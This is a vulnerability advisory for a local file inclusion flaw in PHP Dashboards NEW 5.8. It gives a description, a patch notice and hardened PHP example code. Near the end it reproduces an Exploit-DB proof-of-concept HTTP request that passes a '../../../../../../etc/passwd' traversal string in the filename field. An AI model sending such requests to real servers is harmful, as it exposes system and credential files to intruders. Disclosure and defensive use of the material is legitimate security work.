Vendor: PHP Dashboards NEW 5.8
Author: Ihsan Sencan
CVSS: 7.5 (HIGH)
Vulnerability type: Local File Inclusion
CWE: 98
Product Name: PHP Dashboards NEW 5.8
Affected Version From: 5.8
Affected Version To: 5.8
Patch Exists: YES
Related CWE: N/A
CPE: 21540104
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
Year: 2019

PHP Dashboards NEW 5.8 – Local File Inclusion

A Local File Inclusion (LFI) vulnerability exists in PHP Dashboards NEW 5.8. The filename parameter of php/file/read.php is used to include a file from the web server's local file system without restriction, so a specially crafted HTTP request carrying an arbitrary file name causes that file to be included in the response. This can be used to read sensitive files on the web server, such as /etc/passwd.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the software.
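As an added example that is not the vendor's or Exploit-DB's code, the following shows the containment pattern a read.php-style endpoint needs so that a user-supplied filename can never leave its storage directory. FILE_ROOT, ALLOWED_EXT and resolve_safe_path are assumed names for this illustration; the vulnerable behaviour described above is avoided by never passing the parameter to include() and by canonicalising the path with realpath() before serving it.

```php
<?php
// Added example (not PHP Dashboards' own code): hardened handling of a
// user-supplied "filename" parameter for a file-read endpoint.
// Assumptions: served files live under FILE_ROOT and only a small set of
// extensions may be returned. resolve_safe_path() returns the canonical
// path to serve, or null when the request must be refused.

const FILE_ROOT   = '/var/www/app/uploads';   // assumed storage directory
const ALLOWED_EXT = ['csv', 'json', 'txt'];   // assumed allow-list

function resolve_safe_path(string $root, string $requested): ?string
{
    // 1. Accept only a bare file name: no separators, no NUL bytes,
    //    no "." or ".." components. This alone blocks ../../etc/passwd.
    if ($requested === '' || strpbrk($requested, "/\\\0") !== false) {
        return null;
    }
    if ($requested === '.' || $requested === '..') {
        return null;
    }
    // 2. Extension allow-list, so .php, .ini or extensionless names are refused.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // 3. Canonicalise both sides and require the target to stay inside $root.
    //    realpath() resolves symlinks, so a link pointing outside fails too.
    $rootReal = realpath($root);
    $target   = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($rootReal === false || $target === false || !is_file($target)) {
        return null;
    }
    if (strpos($target, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

// Endpoint glue: stream the bytes with readfile(), never include() them.
$path = resolve_safe_path(FILE_ROOT, (string)($_POST['filename'] ?? ''));
if ($path === null) {
    http_response_code(400);
    exit('invalid filename');
}
header('Content-Type: text/plain; charset=UTF-8');
readfile($path);
```

The same three checks (name-only input, extension allow-list, realpath containment) apply to any endpoint that maps a request parameter to a file, and a 400 on refusal gives the web server log a clean signal to alert on.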

Exploit-DB raw data:

# Exploit Title: PHP Dashboards NEW 5.8 - Local File Inclusion
# Dork: N/A
# Date: 2019-01-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://dataninja.biz
# Software Link: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/php/file/read.php
# 

POST /[PATH]/php/file/read.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

filename=../../../../../../etc/passwd

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 20 Jan 2019 20:56:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Host-Header: 192fc2e7e50945beb8231a492d6a8024